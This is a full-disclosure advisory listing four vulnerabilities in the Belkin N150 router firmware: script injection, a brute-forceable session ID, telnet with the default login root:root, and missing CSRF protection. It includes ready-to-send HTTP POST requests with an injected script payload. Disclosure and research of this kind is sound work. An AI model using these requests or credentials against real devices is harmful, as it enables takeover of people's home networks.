1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 |
##Full Disclosure: #Exploit Title: Belkin N150 Wireless Home Router Multiple Vulnerabilities #Exploit Author : Rahul Pratap Singh #Date : 30/Nov/2015 #Home Page Link : http://www.belkin.com #Blog Url : 0x62626262.wordpress.com #Linkedin : https://in.linkedin.com/in/rahulpratapsingh94 #Status : Not Patched → Vulnerability/BUG Report : 1) • Vulnerability Title:HTML/Script Injection • Version:F9K1009 v1 • Firmware :1.00.09 → Proof of Concept: "InternetGatewayDevice.DeviceInfo.X_TWSZ-COM_Language" this parameter is vulnerable. <blockquote class="wp-embedded-content" data-secret="zKI4v6LMAk"><a href="https://0x62626262.wordpress.com/2015/11/30/belkin-n150-router-multiple-vulnerabilities/" target="_blank"rel="external nofollow" class="external" >Belkin N150 Router Multiple Vulnerabilities</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; visibility: hidden;" title="“Belkin N150 Router Multiple Vulnerabilities” — Rahul Pratap Singh" src="https://0x62626262.wordpress.com/2015/11/30/belkin-n150-router-multiple-vulnerabilities/embed/#?secret=2InDOVgoE5#?secret=zKI4v6LMAk" data-secret="zKI4v6LMAk" frameborder="0" marginmarginscrolling="no"></iframe> → Steps to Reproduce: Send the following post request using Burpsuite,etc POST /cgi-bin/webproc HTTP/1.1 Host: 192.168.2.1 User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=deviceinfo&var:oldpage=- Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 260 %3AInternetGatewayDevice.DeviceInfo.X_TWSZ-COM_Language="><script>alert("1")</script><script>"&obj-action=set&var%3Apage=deviceinfo&var%3Aerrorpage=deviceinfo&getpage=html%2Findex.html&errorpage=html%2Findex.html&var%3ACacheLastData=U1BBTl9UaW1lTnVtMT0%3D 2) • Vulnerability Title:Session Hijacking • Version:F9K1009 v1 • Firmware :1.00.09 → Proof of Concept: Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT sessionid is allocated using hex encoding and of fixed length i.e 8 . Therefore, it is very easy to bruteforce it in feasible amount for time as this session id ranges from 00000000 to ffffffff → Steps to Reproduce: Send the following request using Burpsuite and Bruteforce the sessionid. POST /cgi-bin/webproc HTTP/1.1 Host: 192.168.2.1 User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=deviceinfo&var:oldpage=- Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT 3) • Vulnerability Title:Telnet Enabled with Default Pass • Version:F9K1009 v1 • Firmware :1.00.09 → Vulnerability Details: Telnet protocol can be used by an attacker to gain remote access to the router with root privileges. → Proof of Concept: <blockquote class="wp-embedded-content" data-secret="zKI4v6LMAk"><a href="https://0x62626262.wordpress.com/2015/11/30/belkin-n150-router-multiple-vulnerabilities/" target="_blank"rel="external nofollow" class="external" >Belkin N150 Router Multiple Vulnerabilities</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; visibility: hidden;" title="“Belkin N150 Router Multiple Vulnerabilities” — Rahul Pratap Singh" src="https://0x62626262.wordpress.com/2015/11/30/belkin-n150-router-multiple-vulnerabilities/embed/#?secret=2InDOVgoE5#?secret=zKI4v6LMAk" data-secret="zKI4v6LMAk" frameborder="0" marginmarginscrolling="no"></iframe> → Steps to Reproduce: 1) Open terminal 2) Type following command: telnet 192.168.2.1 3) Default user and pass is root:root 4) • Vulnerability Title:Cross Site Request Forgery • Version:F9K1009 v1 • Firmware :1.00.09 → Proof of Concept: Request doesn't contain any CSRF-token. Therefore, requests can be forged. It can be verified with any request. Status: Vendor Notified: 20 Oct 2015 Vendor Notified Again:25 Nov 2015 No Response. Full Disclosure: 30 Nov 2015 Ref: <blockquote class="wp-embedded-content" data-secret="zKI4v6LMAk"><a href="https://0x62626262.wordpress.com/2015/11/30/belkin-n150-router-multiple-vulnerabilities/" target="_blank"rel="external nofollow" class="external" >Belkin N150 Router Multiple Vulnerabilities</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; visibility: hidden;" title="“Belkin N150 Router Multiple Vulnerabilities” — Rahul Pratap Singh" src="https://0x62626262.wordpress.com/2015/11/30/belkin-n150-router-multiple-vulnerabilities/embed/#?secret=2InDOVgoE5#?secret=zKI4v6LMAk" data-secret="zKI4v6LMAk" frameborder="0" marginmarginscrolling="no"></iframe> |